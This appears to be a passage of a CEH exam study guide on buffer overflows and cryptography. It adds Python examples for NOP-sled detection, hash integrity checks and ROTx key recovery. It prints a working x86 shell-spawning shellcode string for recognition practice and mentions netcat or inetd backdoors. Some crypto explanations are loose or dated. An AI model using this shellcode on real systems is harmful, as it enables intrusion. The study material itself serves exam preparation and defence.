Exploits for Buffer Overflows utilize Shellcode. These bits of assembly level programming language are written to cause the buffer overflows and give a hacker a measure of control. For the CEH test be able to identify shellcode such as this:

    /* This is the minimal shellcode from the tutorial */
    static char shellcode[] =
        "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
        "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

No Operations
Most CPUs have a No Operation instruction, or NOP. This instruction tells a processor not to process the following code until it gets to a certain pointer in the program. A long string of these instructions can be placed into an exploit, which is called a NOP sled. The NOP sled is often encoded to look like something else, but recognizing 0x90 as a standard NOP is recommended.

Knowledge Required to Create a Buffer Overflow Exploit
To create a Buffer Overflow the hacker has to have an understanding of the underlying structures such as stack and heap memory processes, system calls at the machine code level, assembly level programming, and knowledge of debugging tools and how higher level programming languages convert into lower level languages.

Knowledge Required to Run a Created Exploit
If a piece of software has a known Buffer Overflow issue there may already be an exploit tool available. Anyone who can find the tool and the vulnerable software in use can run the exploit.
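Recognising 0x90 is what the exam wants; what a sensor actually does with that knowledge is look for the shape of a sled, a long run of one repeated byte, in payloads. The added Python example below (not from the study guide) implements that detector, flags runs of 0x90 separately from runs of other bytes (an encoded sled still repeats one single-byte instruction), and shows the false-positive control a practitioner needs: an allowlist of bytes whose long runs are routine in benign data. The payloads, the run-length threshold and the allowlist are constructed assumptions to be tuned per environment.

```python
"""Flag long runs of one repeated byte in a payload: the shape of a NOP sled."""
from typing import Dict, List, Tuple

NOP = 0x90          # canonical x86 NOP
MIN_RUN = 16        # assumption: shorter runs are too common in normal data to alert on
# Assumption: bytes whose long runs are routine in benign traffic (padding, spaces);
# tune this allowlist for the traffic you actually monitor.
BENIGN_RUN_BYTES = {0x00, 0x20, 0xFF}


def find_runs(payload: bytes, min_len: int = MIN_RUN) -> List[Tuple[int, int, int]]:
    """Return (offset, length, byte_value) for every run of a repeated byte >= min_len."""
    runs = []
    i, n = 0, len(payload)
    while i < n:
        j = i
        while j < n and payload[j] == payload[i]:
            j += 1
        if j - i >= min_len:
            runs.append((i, j - i, payload[i]))
        i = j
    return runs


def classify(payload: bytes, min_len: int = MIN_RUN) -> str:
    """'nop-sled' for a run of 0x90; 'repeated-byte-sled' for a run of any other
    non-allowlisted byte (an encoded sled repeats some single-byte instruction
    with a harmless side effect, so any long repeat deserves a look); else 'clean'."""
    suspicious = [r for r in find_runs(payload, min_len) if r[2] not in BENIGN_RUN_BYTES]
    if any(value == NOP for _, _, value in suspicious):
        return "nop-sled"
    if suspicious:
        return "repeated-byte-sled"
    return "clean"


# Constructed payloads (not real exploit traffic).
SAMPLES = {
    "classic": b"GET /cgi-bin/x?" + b"\x90" * 64 + b"\xcc\xcc\xcc\xcc",
    "pattern": b"name=" + b"A" * 200,                 # the usual overflow probe
    "padding": b"\x00" * 512,                          # zero padding is normal, not a sled
    "text":    b"The quick brown fox jumps over the lazy dog. " * 4,
    "short":   b"\x90" * 8,                            # below threshold
}


def classify_samples() -> Dict[str, str]:
    return {name: classify(payload) for name, payload in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name:8s} {verdict:20s} runs={find_runs(SAMPLES[name])}")
```

The "pattern" sample is the classic long run of "A" characters: it is also the kind of input the debugging step described below feeds to a program, so a sensor that flags it is seeing an overflow probe, not necessarily a finished exploit.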

Identifying Buffer Overflow Vulnerabilities
Identifying these vulnerabilities is generally done by code review and manual testing. Debugging software such as OllyDbg can be used to generate malformed input in programs and watch exactly how the Stack or Heap handles the problem.

Smashing the Stack
In general, a Buffer Overflow allows a hacker to control where the program looks for information in the stack and point it to code they want to run. This is known as smashing the stack. After the stack is smashed the hacker has the same privileges as the process, and can then attempt to gain superuser access. It is also possible to create backdoors using inetd or Trivial FTP, or make connections using netcat.

Preventing Buffer Overflow Attacks
The prevention of Buffer Overflow attacks comes from having programmers who are familiar with what can happen when the stack or heap is left open to these vulnerabilities. By using safe languages or making sure not to use unsafe functions in languages you can prevent many common overflows. By having a strong code review process after the code is written you can find possible cracks.

Data Execution Prevention (DEP)
DEP is a set of hardware and software technologies that work to monitor programs and verify in real time whether they are using system memory in a safe manner.

Buffer Overflow Penetration Testing
If the source code is available, review the code for insecure function calls. If the source code is not available, reverse engineering is possible using disassemblers and debugging tools. The process for using the debugger involves sending the code large amounts of input data and watching how the code handles it. Understanding the programming involved is required. As always, documentation of all the findings is critical to a good penetration test.

Module 18 Cryptography Study Guide

Objectives:
Introduction and Definitions
Types of Cryptography
Ciphers
Algorithms
Message Hashes / Digests
Public Key Infrastructure (PKI)
Disk Encryption
Cryptography Attacks

Introduction and Definitions
Cryptography is used to make data unreadable, literally meaning "hidden writing". This is usually done by a mathematical algorithm which takes information and turns it into what is called cipher text, a process called encoding. For example: you can rotate the alphabet by thirteen characters so that "computer" becomes "pbzchgre"; each letter is substituted with the letter that is 13 places in front of it. This is a very basic method known as ROT13. The plaintext is "computer", the cipher text is "pbzchgre", and the algorithm is rotating letters 13 places down the alphabet.

Cryptography is used to keep data confidential. In order to create a confidential method, the algorithm used requires a crypto-variable or key. The use of a key results in a unique algorithm; this allows multiple users to use a common algorithm while maintaining confidentiality. Instead of using ROT13 as above it becomes ROTx, where x can represent any number of rotations. When someone is authenticated to use the encrypted data they are given the keys necessary to decrypt it and view the data. Cryptography is also used to provide data integrity and non-repudiation. Integrity is the ability to be sure that the data has not been altered. Non-repudiation is the ability to be sure that the data came from a certain source by attaching a digital fingerprint to a message.

Types of Cryptography

Asymmetric
Asymmetric encryption uses one key to encrypt and a different key to decrypt. These are the public and private keys. If something is encrypted with the private key, it can only be decrypted with the public key. If something is encrypted with the public key it can only be decrypted by the private key. The private key is what the entity keeps private. When the private key is used to encrypt a message it is effectively enclosed in a "digital envelope". This provides non-repudiation; the entities involved know that only the holder of the private key could have wrapped it with encryption that is opened with a specific public key. Likewise, a message encrypted with an entity's public key can only be read by the entity with the private key, assuring the parties of confidentiality. It is important to remember that the keys in such a structure cannot be derived from each other.

Asymmetric encryption is used when the key needs to be transmitted securely where it would be infeasible to do so out of band, such as in email encryption.

Symmetric
Symmetric encryption uses the same key for encryption and decryption. The entities using this key have to take great care in protecting this key; anyone with access to this key can read any message that is encrypted with it. This key is usually kept at a secure location and is transferred out of band. Symmetric encryption is faster than using asymmetric. IPSEC is a good example, which is used for VPN type traffic that requires a high rate of transmission.

Hash Function
A hash function is a one way method of encryption. It does not require a key. It is used to create a piece of cipher text which does not need to be decrypted. This is used to provide integrity for a file, such as a checksum. A piece of plaintext passed through an algorithm gives a message digest hash, which can be used to prove that the plaintext is whole, proving integrity.

Ciphers

Block Ciphers
Block Ciphers encrypt blocks of data. Some ciphers can only use blocks of certain sizes, others are able to use variable block sizes. This cipher is slow, and is commonly used for larger sets of data. The ciphers work by breaking the data into blocks of whatever size, such as 160 bit blocks, then encrypting each piece.

Stream Ciphers
Stream ciphers encrypt continuous streams of data. These are often used in symmetric encryption for data that has to be transmitted quicker. This type of cipher does not require certain data size blocks.

Algorithms

DES
This block cipher was chosen in 1976 by the US NSA to be the U.S. Data Encryption Standard. DES uses a key of 56 bits, thought at the time to be beyond the ability of any computer to brute force attack and determine the key.

As computer power has increased in the last three decades the 56 bit key is no longer considered secure. Triple DES was created by taking the DES cipher algorithm and applying it three times to each data block, with a different key each time. This gives an effective key length of 168.

RC Algorithms
The RC algorithms are a set of symmetric-key encryption algorithms invented by Ron Rivest. RC4 is a widely used variable bit stream cipher. RC5 is a 32/64/128-bit block cipher developed in 1994. RC6 is a 128-bit block cipher based heavily on RC5, created in 1997.

RSA
RSA is a public-key cipher used for both confidentiality and digital signatures, based on the difficulty of factoring large numbers.

AES
AES is a symmetric-key block cipher. It uses 128 bit blocks and has a variable key size of 128, 192 or 256 bits. AES is currently considered the standard for secure encryption.

Message Hashes / Digests
Message Digests or Message Hashes are one way encryption of a block of data. This cipher text is called a Hash Value. If any bit in the original text changes, every bit has a fifty percent chance of also changing, making it infeasible for two documents to have the same hash value. These values are used for verifying file or message integrity. They are also used as an identifier for files or persons where it is a bad idea to transmit a password.

Message Digest Ciphers

MD5
MD stands for Message Digest. An MD5 hash is a 32 digit hexadecimal number that can be used as a digital fingerprint or signature. It was shown to be weak to Collision Attacks in 2008.

SHA
The Secure Hashing Algorithm was created by the NSA as part of a U.S. Federal Information Processing Standard. SHA-1 produces a 160 bit digest from a message. It is very similar to MD5. SHA-2 has two different functions: SHA-256, which can produce an output of either 256 or 224 bits, and SHA-512, which can produce an output of either 512 or 384 bits. NIST has stated that the Federal government is required to use SHA-2 functions after 2010.
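The digest sizes and the "fifty percent chance" avalanche property described above can be checked directly. This added Python example (not from the study guide) computes MD5, SHA-1, SHA-256 and SHA-512 digests with the standard library, counts how many digest bits change when one letter of the input changes, and performs the integrity check a file verifier does, using a constant-time comparison. The inputs ("computer" and a one-letter variant) are constructed for the example.

```python
"""Message digests in practice: fixed-size fingerprints, the avalanche effect,
and a constant-time integrity check."""
import hashlib
import hmac
from typing import Dict, Tuple

ALGORITHMS = ("md5", "sha1", "sha256", "sha512")


def digest_hex(data: bytes, algo: str = "sha256") -> str:
    """Hex digest of data under the named algorithm."""
    return hashlib.new(algo, data).hexdigest()


def digest_lengths(data: bytes) -> Dict[str, int]:
    """Hex digest length per algorithm: 32, 40, 64 and 128 characters,
    i.e. 128, 160, 256 and 512 bits, whatever the input size."""
    return {algo: len(digest_hex(data, algo)) for algo in ALGORITHMS}


def bit_difference(a: bytes, b: bytes, algo: str = "sha256") -> Tuple[int, int]:
    """(bits that differ, total bits) between the digests of a and b.
    For a good hash, roughly half the bits differ even for a one-letter change."""
    da = hashlib.new(algo, a).digest()
    db = hashlib.new(algo, b).digest()
    diff = sum(bin(x ^ y).count("1") for x, y in zip(da, db))
    return diff, len(da) * 8


def verify_integrity(data: bytes, expected_hex: str, algo: str = "sha256") -> bool:
    """Recompute the digest and compare in constant time, so the check itself
    does not leak how many leading characters matched."""
    return hmac.compare_digest(digest_hex(data, algo), expected_hex.lower())


# Constructed inputs: the guide's own example word and a one-letter change.
ORIGINAL = b"computer"
TAMPERED = b"computet"

if __name__ == "__main__":
    print(digest_lengths(ORIGINAL))
    for algo in ALGORITHMS:
        changed, total = bit_difference(ORIGINAL, TAMPERED, algo)
        print(f"{algo:7s} {changed}/{total} bits changed")
    published = digest_hex(ORIGINAL)
    print("original verifies:", verify_integrity(ORIGINAL, published))
    print("tampered verifies:", verify_integrity(TAMPERED, published))
```

The digest only proves integrity if the expected value itself arrived intact; a checksum published next to the download on the same server is no protection against whoever can change the download, which is why signatures, covered under PKI below, are layered on top.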

Examples of Message Digest Uses

SSL and TLS communication between clients and servers uses hash functions during the handshake stage to start communication. The client asks the server for a secure connection and presents the list of hash functions it can use. The server chooses the strongest one available that both can use and tells the client. The server then presents its digital certificate, which has been generated using a hash function, to the client. The client can then check the certificate with the Trust authority. Once this is done the client encrypts a random number with the server's Public key so that only the server can decrypt it. From that random number both server and client generate session keys to be used for the symmetric encryption.

SSH (Secure Shell) uses Public and Private Keys to authenticate users and generate a secure tunnel. You generate a key pair using a tool like PuTTY. The Public key is stored on the SSH server that needs to be available for connection. Using a hash function you create a signature from your private key, which only you could generate. When using SSH to log on to the server you present this digital signature to the server, which can verify it with the public key. The private key is never transmitted.

Public Key Infrastructure (PKI)

PKI refers to all the background parts needed to use digital certificates as a way of equating public keys to the entities using them.

Authorities

Registration Authority
This entity handles the requests of an entity (server, computer, or person) to obtain a digital certificate.

Certification Authority
This entity generates and assigns certificates to entities. Also referred to as a Trusted Third Party (TTP).

Validation Authority
This entity handles the requests for confirmation that an entity is who they say they are when they present a digital certificate.

In some systems these entities may all be one server. The term PKI is sometimes used incorrectly to refer to the Certificate Authority (CA). The term "digital certificate" refers to the X.509 standard document used in PKI.

Examples of commercial Certification Authorities include VeriSign, Go Daddy, and Comodo.

PKI can also exist in a Web of Trust model, as implemented in the Pretty Good Privacy free version of email encryption. A web of trust exists as a set of certificates that a user trusts and can be used with the commercial models as long as another Certificate Authority will back the self-signed certificates as authentic.

Uses of PKI

PKI is used in both encrypted email and encrypted web traffic. In email encryption, a message can be run through a hash function which creates a hash value unique to the message. This function is added as a signature to the message. The message itself is encrypted with the recipient's public key, so that it can only be decrypted by that recipient using their private key, ensuring Confidentiality. When the message is decrypted, the hash value can be decrypted using the sender's Public key, ensuring the Integrity of the email message.

In web traffic such as SSL and TLS, websites are issued certificates from Certification Authorities to use to handshake and identify themselves to clients.

Disk Encryption
Disk encryption refers to encrypting the data on a hard drive or other media. When the data in storage is encrypted it assures confidentiality of the data. One best practice is to encrypt all data backups when they are put onto removable media such as DVD or tape.

Our practice uses the free tool TrueCrypt for disk encryption. TrueCrypt also has the ability to create a hidden volume within an encrypted volume for plausible deniability. This hidden volume cannot be detected unless supplied with the hidden volume passphrase.

Cryptography Attacks
All cryptographic attacks assume that the person doing the attack has access to encrypted information.

Brute Force attacks attempt to try every possible key for the cryptographic function. Success depends on how long the key is, how much time the hacker has, and what other security mechanisms are in place such as account lockout. The time and security mechanisms can be bypassed by techniques such as using Rainbow tables against a stolen hash.

Known Plaintext attacks are those attacks where a hacker has the whole of the plaintext that has been encrypted and the associated cipher text. When an attacker has the whole encrypted message it is possible to figure out the algorithm used to encrypt the plaintext.

Chosen Plaintext attacks occur when a hacker can choose a piece of plaintext and has access to the encryption function. Using the hacker's plaintext he can then take the generated cipher text and compare it to the plaintext to figure out a key.

Chosen Ciphertext attacks occur when a hacker has the ability to take a piece of Ciphertext and decrypt it, then analyze the output. This is similar to the newspaper style puzzles where you have a method of how the message is set up and the encrypted message.

Social Engineering attacks such as phishing or shoulder surfing can give an attacker the passwords or keys used in encryption by taking advantage of the users in question.

While attacks against the ciphers themselves do occur, it is often quicker to attack the implementation or the person who uses the encryption instead. These methods are called Side Channel attacks.

Rubber Hose attacks refer to using physical violence against someone who has knowledge of the encryption keys to force them to reveal those keys.
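Two passages of this module fit one worked example: the ROTx cipher from the introduction, where the rotation count is the crypto-variable (key), and the Brute Force and Known Plaintext attacks above. The added Python example below (not from the study guide) implements ROTx with a key, checks the guide's own ROT13 pair ("computer" / "pbzchgre"), and then shows why a 25-key space gives no confidentiality: one known plaintext/ciphertext pair recovers the key, and without any plaintext all candidate decryptions can simply be listed. The message texts are constructed for the example.

```python
"""ROTx as a keyed algorithm: the rotation count is the key. Shows why a
25-key cipher falls to a known-plaintext or brute-force attack."""
import string
from typing import Dict, Optional

ALPHABET = string.ascii_lowercase


def rot(text: str, key: int) -> str:
    """Shift ASCII letters by key positions, preserving case; every other
    character (digits, spaces, punctuation, non-ASCII letters) passes through."""
    key %= 26
    out = []
    for ch in text:
        if ch.isalpha() and ch.lower() in ALPHABET:
            shifted = ALPHABET[(ALPHABET.index(ch.lower()) + key) % 26]
            out.append(shifted.upper() if ch.isupper() else shifted)
        else:
            out.append(ch)
    return "".join(out)


def encrypt(plaintext: str, key: int) -> str:
    return rot(plaintext, key)


def decrypt(ciphertext: str, key: int) -> str:
    return rot(ciphertext, -key)


def recover_key(known_plaintext: str, ciphertext: str) -> Optional[int]:
    """Known-plaintext attack: with one plaintext/ciphertext pair the key is
    found by trying all 26 rotations (key 0 is the identity, so 25 real keys).
    Returns None if no rotation maps the plaintext onto the ciphertext."""
    for key in range(26):
        if encrypt(known_plaintext, key) == ciphertext:
            return key
    return None


def brute_force(ciphertext: str) -> Dict[int, str]:
    """Brute force with no plaintext at all: every candidate decryption, for a
    human or a dictionary check to pick out the readable one."""
    return {key: decrypt(ciphertext, key) for key in range(26)}


if __name__ == "__main__":
    # Constructed messages.
    print(encrypt("computer", 13))                       # pbzchgre, the guide's example
    ct = encrypt("Meet at 10:00", 7)
    print(ct, "-> key", recover_key("Meet at 10:00", ct))
    for key, candidate in brute_force(ct).items():
        print(f"{key:2d} {candidate}")
```

The same structure, try every key and compare against a known pair, is what makes a short key fatal for any cipher, which is the point of the 56-bit DES discussion earlier in the module; the key space, not the secrecy of the algorithm, is what an attacker has to exhaust.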
